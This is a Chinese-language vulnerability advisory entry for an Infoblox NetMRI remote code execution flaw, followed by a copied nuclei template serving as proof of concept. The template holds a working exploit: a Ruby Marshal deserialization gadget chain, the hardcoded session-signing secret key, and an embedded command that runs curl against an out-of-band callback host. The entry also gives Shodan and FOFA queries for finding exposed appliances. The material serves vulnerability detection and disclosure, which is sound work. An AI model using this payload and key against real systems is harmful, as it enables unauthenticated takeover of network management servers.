Infoblox NetMRI 远程代码执行漏洞

漏洞信息

漏洞名称: Infoblox NetMRI 远程代码执行漏洞

漏洞编号:

  • CVE: CVE-2013-0156

漏洞类型: 反序列化

漏洞等级: 严重

漏洞描述: Infoblox NetMRI是一款网络管理工具,广泛用于企业网络环境中,用于自动化网络配置、合规性检查和故障排除。该产品在虚拟设备中部署,是企业网络基础设施的重要组成部分。该漏洞存在于NetMRI的Ruby on Rails组件中,由于使用了硬编码的会话cookie密钥,攻击者可以利用这一漏洞进行远程代码执行。具体来说,Rails web组件在验证会话cookie签名密钥时,如果密钥有效,会反序列化会话cookie。攻击者如果知道这一硬编码密钥,可以构造恶意的会话cookie,当这些cookie被应用程序反序列化时,会导致任意代码执行。这一漏洞与已知的Ruby on Rails反序列化漏洞(CVE-2013-0156)相关。Infoblox并未为此问题分配新的CVE编号,因为它是由底层Rails漏洞引起的。此漏洞的影响极为严重,攻击者可以利用它完全控制系统,可能导致数据泄露、服务中断或其他恶意活动。由于漏洞利用不需要认证,且可以自动化执行,因此风险极高。建议用户立即升级到Infoblox NetMRI 7.6.1或更高版本以修复此漏洞。

产品厂商: Infoblox

产品名称: NetMRI

影响版本: version < 7.6.1

搜索语法: http.title:”netmri” OR http.favicon.hash:”-319724102” OR icon_hash=”-319724102” OR “infoblox netmri”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/5fec24101e9f17d7337f036b9956fad832dae623/http%2Fvulnerabilities%2Finfoblox%2Finfoblox-netmri-rails-cookie-rce.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

id: infoblox-netmri-rails-cookie-rce

info:
  name: Infoblox NetMRI < 7.6.1 - Remote Code Execution via Hardcoded Ruby Cookie Secret Key
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    Infoblox NetMRI virtual appliances before version 7.6.1 are vulnerable to remote code execution (RCE) due to the use of a hardcoded Ruby on Rails session cookie secret key. The Rails web component deserializes session cookies if the signing key is valid. Attackers with knowledge of this key can craft malicious session cookies that are deserialized by the application, leading to arbitrary code execution. This vulnerability is related to the known Ruby on Rails deserialization flaw (CVE-2013-0156). Infoblox did not assign a new CVE for this issue, as it is a result of the underlying Rails vulnerability.
  impact: |
    An attacker can exploit this vulnerability to execute arbitrary commands on the NetMRI server, potentially leading to complete system compromise.
  remediation: |
    Upgrade Infoblox NetMRI to version 7.6.1 or later to mitigate this vulnerability.
  reference:
    - https://rhinosecuritylabs.com/research/infoblox-multiple-cves/
    - https://nvd.nist.gov/vuln/detail/CVE-2013-0156
  classification:
    cwe-id: CWE-502
  metadata:
    verified: true
    max-request: 1
    vendor: infoblox
    product: netmri
    shodan-query:
      - http.title:"netmri"
      - http.favicon.hash:"-319724102"
    fofa-query:
      - icon_hash="-319724102"
      - infoblox netmri
  tags: infoblox,netmri,rails,rce,deserialization,oast

variables:
  oast: ".{{interactsh-url}}"
  padded_oast: "{{padding(oast,'a',50,'prefix')}}"
  old_code: "b3BlbigifGN1cmwgeHh4eC4yYmVyNzQyYXVyZ3BrN2Jpc3cxY3BodWg5OGZ6M3J5Zm4ub2FzdGlmeS5jb20iKQ=="
  code1: 'open("|curl {{padded_oast}}")'
  marshal_data: '{{base64(replace(base64_decode("BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgc6CUBzcmNJInhldmFsKCdiM0JsYmlnaWZHTjFjbXdnZUhoNGVDNHlZbVZ5TnpReVlYVnlaM0JyTjJKcGMzY3hZM0JvZFdnNU9HWjZNM0o1Wm00dWIyRnpkR2xtZVM1amIyMGlLUT09Jy51bnBhY2soJ20wJykuZmlyc3QpBjoGRVQ6DEBsaW5lbm9pADoMQG1ldGhvZDoLcmVzdWx0"),old_code,base64(code1)))}}'
  signature: "{{hmac('sha1', marshal_data, 'b525fc341ce5f4d76505e7664863750f865823ba866c536e0246c195cd6cf19cc63771d6becd71c99f5beef080ac27bc3b4f72430840d83cb4efd62acb7c6dcf')}}"

http:
  - raw:
      - |
        GET /webui/gui_states/index.json HTTP/1.1
        Host: {{Hostname}}
        Cookie: _netmri={{urlencode(marshal_data)}}--{{signature}}

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol, 'dns')"
          - "status_code == 500"
        condition: and